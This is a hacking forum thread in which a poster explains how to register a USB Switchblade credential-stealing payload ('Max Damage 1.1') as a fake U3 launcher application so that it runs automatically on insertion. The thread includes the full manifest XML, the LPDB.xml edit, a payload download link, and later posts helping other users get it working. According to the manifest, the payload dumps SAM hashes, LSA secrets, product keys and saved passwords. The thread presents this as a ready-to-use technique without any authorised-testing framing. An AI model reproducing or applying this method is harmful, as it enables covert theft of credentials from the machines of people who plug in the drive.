Jump to content

Autorun a switchblade payload and keep your U3 launcher.


Guest TehHacks

Recommended Posts

Guest TehHacks

******INTRODUCTION******

Alright, i dont know if this has already been done, i looked around the forums a bit but couldnt find anyone using the sam technique.

ok, basicly, this method works by makeing the U3 lanuchpad think that the payload you are using is a U3 application and setting the U3 launchpad to auto run it when the drive is incerted.

the advantages to this method are:

1)You get to keep you pretty U3 launch pad.

2)You get to choose wether or not your payload AUTO runs or not.

3)You can put more than one payload on your USB drive.

If you are doing this with the maxdamage payload 1.1, just follow my examples exactly.

******INSTRUCTIONS******

For this tutorial i will be using the Max Damage 1.1 Payload, all though you can use what ever Payload that you want.

1. Install the latest U3 launchpad, you can find it here:

http://www.sandisk.com/Retail/Default.aspx?CatID=1411

2. Download your payload, i am using the Max Damage payload 1.1, you can find it here:

http://www.hak5.org/releases/2x02/switchbl...1.1-payload.rar

3. Place the payload on your USB drive as you usualy would:

eg.

PayLoad: x:wipcmd*payload files*

and

Logfiles: x:Documentslogfiles*logfiles*

fig1.JPG

4. Open up the Hidden System folder in the root of the drive and navigate into the Apps folder. Create a folder of any name, the payload name makes things easier. This is going to become the uuid, so remember what you named it for later.

(ex: i created x:SystemAppsMaxDamage)

fig2.JPG

5. Inside the newly created folder, make a new folder named Manifest. Inside create a new notepad document. Rename the document to Manifest.u3i. Manifest.u3i is really a disguised XML file that the U3 Launcher uses to describe your program with. Having one is Vital to the Launcher.

(ex: i created x:SystemAppsMaxDamageManifestManifest.u3i)

fig3.JPG

5. Make or find an icon. I used the U3 icon, but you can use what ever icon you want. try just taking the favicon from a website. Put the .ico in the Manifest folder right next to the Manifest.u3i

fig4.JPG

6. Edit Manifest.u3i in notepad (or TextPad, etc) and input this as a template (this is what it would look like if you are using the maxdamage payload 1.1):

<?xml version="1.0" encoding="UTF-8"?>

<u3manifest version="1.0">

<application uuid="Maxdamage" version="1">

<icon>U3.ico</icon>

<name>Maxdamage Payload 1.1</name>

<vendor url="http://hak5.org/forums/viewtopic.php?t=2361">Hak.5 Forum</vendor>

<description>This payload gathers IP information, dumps SAM, product keys, LSA secrets, network passwords, messenger passwords, and URL history. </description>

<options>

<minFreeSpace>1</minFreeSpace>

<upgrade appData="overwrite" deviceExec="overwrite"/>

</options>

</application>

<actions>

<appStart workingdir="%U3_DEVICE_PATH%WIPCMD" cmd="%U3_DEVICE_PATH%WIPCMDgo.cmd">start</appStart>

<appStop workingdir="%U3_DEVICE_PATH%WIPCMD" cmd="%U3_DEVICE_PATH%WIPCMDgo.cmd">stop</appStop>

</actions>

</u3manifest>

Make application uuid the same name as the file folder in your Apps directory (ex: MaxDamage). This is the ID of the application, you will need to use it again elsewhere.

version is just the version of the application, its arbitrary, set it correctly if you want your launcher to display the correct version of your payload.

icon is the name of the icon that you want to display on your program list, the one that you place in you manifest folder

name = display name.

vendor url and description = the url of the program's website and the description displayed in "Manage U3 Programs."

minFreeSpace = number of MB that the program requires on the drive, rounded up to the nearest MB.

appStart and appStop, there are a few more optional actions like clean up, but these two are the required two to run your program.

workingdir = the directory that your program runs from/in. Set this as the file folder that your executable is located in, make sure you use %U3_DEVICE_PATH% rather than the drive letter (ex:%U3_DEVICE_PATH%WIPCMD ).

cmd = the File that you want to run when you click the button.

Save. (ex: %U3_DEVICE_PATH%WIPCMDgo.cmd)

fig5.JPG

7. Zip the Manifest folder and name as the same name of your uuid from before. The items inside the zip file MUST be placed in the correct location.

Follow my example:

Inside my Maxdamage.zip is a Folder with the name Manifest

Inside the Manifest folder is a Manifest.u3i and a U3.ico

MaxDamage.zip => ManifestManifest.u3i and ManifestU3.ico

fig6.JPG

Now rename the uuid.zip folder to uuid.u3p (ex: MaxDamage.zip -> MaxDamage.u3p) and leave it in the uuid folder (ex: now i have a x:SystemAppsMaxdamageMaxdamage.u3p)

fig7.JPG

8. Go back to the Apps folder (ex: x:SystemApps) and find and edit the LPDB.xml file.

add in

<APPLICATION guid="Maxdamage" launchOnStart="N" lastUsed="30/12/2006 13:24:25">Maxdamage.u3p</APPLICATION>

right next to the ones similar to it. change the guid to your uuid and the location accordingly. If yours is empty, just add this in between the two open and close tags.

fig8.JPG

9. Eject your USB Drive and plug it back in.

When the U3 Launcher loads when you plug it back and and you did everything correct, you have a new item on your program list. If you left a typo in the code or something went wrong, it will tell you that the u3p failed to load and if you want to delete the program associated to it.

10. Now your playload should show up in U3 launch pad "U3 smart programs" menu with the .ico you picked next to it.. to enable it to auto run, right click on select "properties" and check the "start on insertion" tab.

fig9.JPG

******Notes and Credits******

If adding screen shots to this guide would help please let me know, and i'll try adn get them done.

alot of credit goes to thus guide:

http://www.elitenews.org/2006/05/installin...mart-drive.html

I used it as a template for this guide, and gain most of my knowleadge on this subject from it.

Link to comment
Share on other sites

Guest TehHacks
That's a really handy technique, might be useful someday..

Its been very usfull to me, since i want to use my USB drive for school, and i want to keep the U3 launcher application.

but i also think the switch blade is a very good tool, and fun to play around with, so its a good way to be able to use both with no dissadvantages.

Link to comment
Share on other sites

Guest TehHacks
hey thanks this guide is really good and do u think you could add some screenshots because this is kind of hard for me to figure out by myself....thanks :D

Sure, I'll Get on that tomorrow, Its late, and i'm on my linux machine. in the mean while take a look at the link in the "Notes and credits" section, that has screen shots, and will hopefully help you out alot, because thats what this technique is based on and if you can do that, using this technique will be easy for you.

Link to comment
Share on other sites

Guest TehHacks
thanks alot TehHacks this really help alot i like ur "uppity" button mod thats pretty cool .good job with the keeping U3 thing

lol, thanks.

it was no problem addding the screen shots, glad i could help.

Link to comment
Share on other sites

so how would i add the hacksaw into the switchblade code...too make both of them on U3...since switchblade already works with U3....can u combine the codes or is it not possible?

edit--- when i copy documents file do i overwrite the one on the flash drive?

Link to comment
Share on other sites

Guest TehHacks
so how would i add the hacksaw into the switchblade code...too make both of them on U3...since switchblade already works with U3....can u combine the codes or is it not possible?

edit--- when i copy documents file do i overwrite the one on the flash drive?

You can overwrite the one on the flash drive, it doesnt matter as long as you have a file named "logfiles" inside the documents folder.

about the hacksaw, i wouldnt know i havnt tryed the hacksaw before, i asume you could just put the hacksaw on our flash drive and use the same technique.

Link to comment
Share on other sites

hey mine doesnt seen to work i have payload 1.1 and in documents i put the "logfiles" and i put WIP in root directory, under apps i have MaxDamage file within it is Manifest and MaxDamage.u3p (zipped file renamed) and inside manifest i have manifest u3i and icon

so heres what it looks like

-F:Documentslogfiles

-F:WIPCMD (with the programs inside)

-F:SystemAppsMaxDamageManifest (has manifest.u3i and icon)

-F:SystemAppsMaxDamage (in the zip file renamed with u3p i have the Manifest folder zipper with the icon and manifest.u3i

heres the code i used for Manifest folder i used the exact same

 <?xml version="1.0" encoding="UTF-8"?>

<u3manifest version="1.0">

<application uuid="MaxDamage" version="1">

<icon>icon.ico</icon>

<name>Maxdamage </name>

<vendor url="http://hak5.org/forums/viewtopic.php?t=2361">Hak.5 Forum</vendor>

<description>This payload gathers IP information, dumps SAM, product keys, LSA secrets, network passwords, messenger passwords, and URL history. </description>

<options>

<minFreeSpace>0</minFreeSpace>

<upgrade appData="overwrite" deviceExec="overwrite"/>

</options>

</application>

<actions>

<appStart workingdir="%U3_DEVICE_PATH%WIPCMD" cmd="%U3_DEVICE_PATH%WIPCMDgo.cmd">start</appStart>

<appStop workingdir="%U3_DEVICE_PATH%WIPCMD" cmd="%U3_DEVICE_PATH%WIPCMDgo.cmd">stop</appStop>

</actions>

</u3manifest>

and now the LPDB.xml file:

[list=]

<LPDB><APPLICATION guid="79EB5C19-AB0E-4dd7-BE89-BF96301D35Z8" launchOnStart="Y" lastUsed="5/24/2006 12:17:27 PM">SanDiskLaunchPadTour.u3p</APPLICATION><APPLICATION guid="EC30627F-0195-44d4-8C24-1B09F3C02C50" launchOnStart="N" lastUsed="5/24/2006 12:17:50 PM">CruzerSync-V5.6.048.u3p</APPLICATION><APPLICATION guid="285E6953-BF3C-4445-9376-3FE5D7F645B2" launchOnStart="N" lastUsed="5/24/2006 12:18:14 PM">signupshield-pm-sandisk-v04_05_15_00.u3p</APPLICATION><APPLICATION guid="1F30627F-0195-44d4-8C24-1999F3C02C50" launchOnStart="N" lastUsed="5/24/2006 12:18:42 PM">avast81.u3p</APPLICATION><APPLICATION guid="0DE4F643-C398-46ec-9339-2362F2311932" launchOnStart="N" lastUsed="5/24/2006 12:19:04 PM">Skype(2.0.14.85)(u3)(1062)hotfix_test.u3p</APPLICATION><APPLICATION guid="f926e6ba-0e86-43c7-973f-bdf6ea2a4d37" launchOnStart="N" lastUsed="1/5/2007 3:02:57 PM">TrueCryptU3.u3p</APPLICATION>

<APPLICATION guid="MaxDamage" launchOnStart="N" lastUsed="30/12/2006 13:24:25">MaxDamage.u3p</APPLICATION></LPDB>

i hope i can get some help cause to me everything looks right

Link to comment
Share on other sites

1. What does this means?:

F:SystemAppsMaxDamage (in the zip file renamed with u3p i have the Manifest folder zipper with the icon and manifest.u3i )

it should look like this

+ MaxDamage.u3p

+ Manifest

Manifest.u3i

icon.ico

2.Change this to 1

<minFreeSpace>0</minFreeSpace>
Link to comment
Share on other sites

wat do u mean? like how would it look....cause in my maxdamage file in the app folder i have a Manifest folder with the icon and manifest.u3i and inside the maxdamage folder in apps is the manifestand maxdamage.u3p with the manifest and icon and manifest.u3i

Link to comment
Share on other sites

Guest TehHacks
hey mine doesnt seen to work i have payload 1.1 and in documents i put the "logfiles" and i put WIP in root directory, under apps i have MaxDamage file within it is Manifest and MaxDamage.u3p (zipped file renamed) and inside manifest i have manifest u3i and icon

so heres what it looks like

-F:Documentslogfiles

-F:WIPCMD (with the programs inside)

-F:SystemAppsMaxDamageManifest (has manifest.u3i and icon)

-F:SystemAppsMaxDamage (in the zip file renamed with u3p i have the Manifest folder zipper with the icon and manifest.u3i

heres the code i used for Manifest folder i used the exact same

 &lt;?xml version="1.0" encoding="UTF-8"?&gt;

&lt;u3manifest version="1.0"&gt;

&lt;application uuid="MaxDamage" version="1"&gt;

&lt;icon&gt;icon.ico&lt;/icon&gt;

&lt;name&gt;Maxdamage &lt;/name&gt;

&lt;vendor url="http://hak5.org/forums/viewtopic.php?t=2361"&gt;Hak.5 Forum&lt;/vendor&gt;

&lt;description&gt;This payload gathers IP information, dumps SAM, product keys, LSA secrets, network passwords, messenger passwords, and URL history. &lt;/description&gt;

&lt;options&gt;

&lt;minFreeSpace&gt;0&lt;/minFreeSpace&gt;

&lt;upgrade appData="overwrite" deviceExec="overwrite"/&gt;

&lt;/options&gt;

&lt;/application&gt;

&lt;actions&gt;

&lt;appStart workingdir="%U3_DEVICE_PATH%WIPCMD" cmd="%U3_DEVICE_PATH%WIPCMDgo.cmd"&gt;start&lt;/appStart&gt;

&lt;appStop workingdir="%U3_DEVICE_PATH%WIPCMD" cmd="%U3_DEVICE_PATH%WIPCMDgo.cmd"&gt;stop&lt;/appStop&gt;

&lt;/actions&gt;

&lt;/u3manifest&gt;

and now the LPDB.xml file:

[list=]

&lt;LPDB&gt;&lt;APPLICATION guid="79EB5C19-AB0E-4dd7-BE89-BF96301D35Z8" launchOnStart="Y" lastUsed="5/24/2006 12:17:27 PM"&gt;SanDiskLaunchPadTour.u3p&lt;/APPLICATION&gt;&lt;APPLICATION guid="EC30627F-0195-44d4-8C24-1B09F3C02C50" launchOnStart="N" lastUsed="5/24/2006 12:17:50 PM"&gt;CruzerSync-V5.6.048.u3p&lt;/APPLICATION&gt;&lt;APPLICATION guid="285E6953-BF3C-4445-9376-3FE5D7F645B2" launchOnStart="N" lastUsed="5/24/2006 12:18:14 PM"&gt;signupshield-pm-sandisk-v04_05_15_00.u3p&lt;/APPLICATION&gt;&lt;APPLICATION guid="1F30627F-0195-44d4-8C24-1999F3C02C50" launchOnStart="N" lastUsed="5/24/2006 12:18:42 PM"&gt;avast81.u3p&lt;/APPLICATION&gt;&lt;APPLICATION guid="0DE4F643-C398-46ec-9339-2362F2311932" launchOnStart="N" lastUsed="5/24/2006 12:19:04 PM"&gt;Skype(2.0.14.85)(u3)(1062)hotfix_test.u3p&lt;/APPLICATION&gt;&lt;APPLICATION guid="f926e6ba-0e86-43c7-973f-bdf6ea2a4d37" launchOnStart="N" lastUsed="1/5/2007 3:02:57 PM"&gt;TrueCryptU3.u3p&lt;/APPLICATION&gt;

&lt;APPLICATION guid="MaxDamage" launchOnStart="N" lastUsed="30/12/2006 13:24:25"&gt;MaxDamage.u3p&lt;/APPLICATION&gt;&lt;/LPDB&gt;

i hope i can get some help cause to me everything looks right

Whats the problem. "hey mine doesnt seen to work" isnt enough, what output message are you getting?

if you are having loads of trouble, i can send you the files and tell you where to put them on your USB stick.

Link to comment
Share on other sites

yes its all like that i have the manifest.u3p and it has the manifest and inside it is manifest.u3i and icon....but my maxdamage.u3p shows the winrar icon on it when i switched it to .u3p and it opens with WinRar....is that a problem??

Link to comment
Share on other sites

Guest TehHacks
yes its all like that i have the manifest.u3p and it has the manifest and inside it is manifest.u3i and icon....but my maxdamage.u3p shows the winrar icon on it when i switched it to .u3p and it opens with WinRar....is that a problem??

Hmmmm interesting, looks like you screwed something up in LPDB.xml.

Make sure it looks like this:

&lt;LPDB&gt;

    &lt;APPLICATION guid="1ED2AA6E-626E-4159-96DD-0A8621CDEFF1" launchOnStart="N" lastUsed="30/12/2006 10:37:22"&gt;FileZilla.u3p&lt;/APPLICATION&gt;

    &lt;APPLICATION guid="reshack" launchOnStart="N" lastUsed="30/12/2006 13:24:25"&gt;reshack.u3p&lt;/APPLICATION&gt;

    &lt;APPLICATION guid="quake" launchOnStart="N" lastUsed="30/12/2006 13:24:25"&gt;quake.u3p&lt;/APPLICATION&gt;

    &lt;APPLICATION guid="devcpp" launchOnStart="N" lastUsed="1/1/2007 14:24:25"&gt;devcpp.u3p&lt;/APPLICATION&gt;

    &lt;APPLICATION guid="DSL" launchOnStart="N" lastUsed="1/1/2007 14:24:25"&gt;DSL.u3p&lt;/APPLICATION&gt;

    &lt;APPLICATION guid="WR26005A-A5F3-471B-9997-3ED6B471B096" launchOnStart="N" lastUsed="02/01/2007 12:12:59"&gt;WinRar 3.62 Final Corporate.u3p&lt;/APPLICATION&gt;

    &lt;APPLICATION guid="GENS" launchOnStart="N" lastUsed="1/1/2007 14:24:25"&gt;GENS.u3p&lt;/APPLICATION&gt;

    &lt;APPLICATION guid="MaxDamage" launchOnStart="N" lastUsed="30/12/2006 13:24:25"&gt;MaxDamage.u3p&lt;/APPLICATION&gt;

&lt;/LPDB&gt;

Everything above

&lt;APPLICATION guid="MaxDamage" launchOnStart="N" lastUsed="30/12/2006 13:24:25"&gt;MaxDamage.u3p&lt;/APPLICATION&gt;

is my applications, DONT COPY IT!!! ONLY THE SECOND LAST LINE.

Link to comment
Share on other sites

i think you have to email me the files i have a hotmail account and gmail pm me if u prefer to email to my gmail....if urs works when i download it would it work the same with Dec C++?...

p.s. can u give me instructions or ill just add u to my msn and u can tell me step by step and i can ask u directyl if theres a problem with it...thanks

edit* i also updated my U3 launcher dont know if that would be a problem...but my bros has the same flash drive as me (nonupdated) so ill just take his :D

would the update be a problem with the maxdamage?

Link to comment
Share on other sites

thanks alot this site is good and i has confirmed that what i wanted to code has been done maybe i can make it better.....really good site geocine

edit* i also wanted to program it on my own so i can learn some stuff.....

Link to comment
Share on other sites

Guest TehHacks
i think you have to email me the files i have a hotmail account and gmail pm me if u prefer to email to my gmail....if urs works when i download it would it work the same with Dec C++?...

p.s. can u give me instructions or ill just add u to my msn and u can tell me step by step and i can ask u directyl if theres a problem with it...thanks

edit* i also updated my U3 launcher dont know if that would be a problem...but my bros has the same flash drive as me (nonupdated) so ill just take his :D

would the update be a problem with the maxdamage?

Updating shouldnt be a problem at all, i'll help you with Dev c++. i'll add you on MSN to help you.

Link to comment
Share on other sites

this switchblade still isn't working, geocine gave me this link http://usb.smithtech.us/u3/index.htm

it can make shorcuts and do manifest and u3p but for some reason wont work with the switchblade....i know im the only person still having trouble with this and i dont know why cause everything is done right and i did it over again...stilll doesnt work :shock:

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...